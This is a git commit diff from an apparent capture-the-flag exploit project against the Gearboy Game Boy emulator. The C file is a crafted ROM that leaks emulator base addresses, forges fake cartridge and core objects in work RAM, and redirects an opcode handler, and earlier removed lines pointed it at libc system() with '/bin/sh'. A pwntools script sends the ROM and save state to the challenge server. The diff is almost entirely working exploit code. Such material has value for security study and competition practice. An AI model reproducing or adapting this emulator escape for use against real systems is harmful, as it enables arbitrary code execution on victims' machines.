commit e3357dff0937f0d7f5c3bbf75bc479f566fee3d0
parent a1f7b8843f887d2d698477d6d8544e545a517725
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 26 May 2022 20:41:58 +0200
Trolled by load instruction
Diffstat:
3 files changed, 38 insertions(+), 13 deletions(-)
diff --git a/Makefile b/Makefile
@@ -22,7 +22,7 @@ main.gb: main.c $(LCC)
$(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
$(GEARBOY):
- make -C ./gearboy/platforms/linux
+ DEBUG=1 make -C ./gearboy/platforms/linux
run: $(GEARBOY) main.gb
$(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -4,8 +4,13 @@
void
main(void)
{
- volatile static uint8_t *processor;
- volatile static uint8_t *memory;
+ volatile static uint8_t *processor_gb;
+ volatile static uint8_t *memory_gb;
+ volatile static uint8_t *gbcore_gb;
+ volatile static uint8_t *cartridge_gb;
+ volatile static uint64_t memory;
+ volatile static uint64_t processor;
+ volatile static uint64_t cartridge;
volatile static uint64_t op0x00;
volatile static uint64_t base;
volatile static uint64_t libc;
@@ -17,17 +22,35 @@ main(void)
/* processor - wrambanks = -0x126a0 */
/* WRAM BANK = -0x13 */
- processor = (void*) 0xD960;
+ processor_gb = (void*) 0xD960;
+ memory_gb = processor_gb - 0xd0;
+
+ /* leak base addr */
+ op0x00 = *(uint64_t*)processor_gb;
+ base = op0x00 - 0x1d420;
+ target = base + 0x13df0;
+
+ /* get real adresses */
+ processor = *(uint64_t*)memory_gb;
memory = processor - 0xd0;
- /* leak libc from addr */
- leak = *(uint64_t*)(memory + 0x30);
- libc = leak + 0x125cff0;
- target = libc + 0x52290; /* system */
+ *(uint64_t*)processor_gb = target;
+
+ /* setup fake cartridge opject behind processor & memory */
+ cartridge = processor - 0x960;
+ cartridge_gb = (void*) 0xD000; /* start of wram bank */
+ *(uint8_t*)(cartridge_gb+0x30) = 1; /* loaded */
+ *(uint8_t*)(cartridge_gb+0x40) = 1; /* battery */
+ strcpy((char*)(cartridge_gb+0x41), "/home/ctf/wrapper.py"); /* filepath */
+
+ /* setup fake gameboycore object */
+ gbcore_gb = processor_gb; /* at processor addr */
+ // *(uint64_t*)(gbcore_gb+0x00) = memory;
+ // *(uint64_t*)(gbcore_gb+0x08) = processor;
+ // *(uint64_t*)(gbcore_gb+0x28) = cartridge;
- /* set opcode 0x00 (nop) to gadget */
- strcpy(processor, "/bin/sh");
- *(uint64_t*)(processor+0x10*0x10) = target;
+ /* set opcode 0x10 (stop) to saveRam */
+ // *(uint64_t*)(processor+0x10*0x10) = target;
// *(uint64_t*)(processor+0x10*0x10) = 0;
__asm \
diff --git a/solve.py b/solve.py
@@ -12,8 +12,10 @@ state = list(open("main.state", "rb").read())
for i,v in enumerate(struct.pack("<i", -0x13)):
state[0x10000+i] = v
-io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
-#io = process("ncat localhost 1024".split())
+if len(argv) > 1:
+ io = process(argv[1:])
+else:
+ io = process("ncat localhost 1024".split())
io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))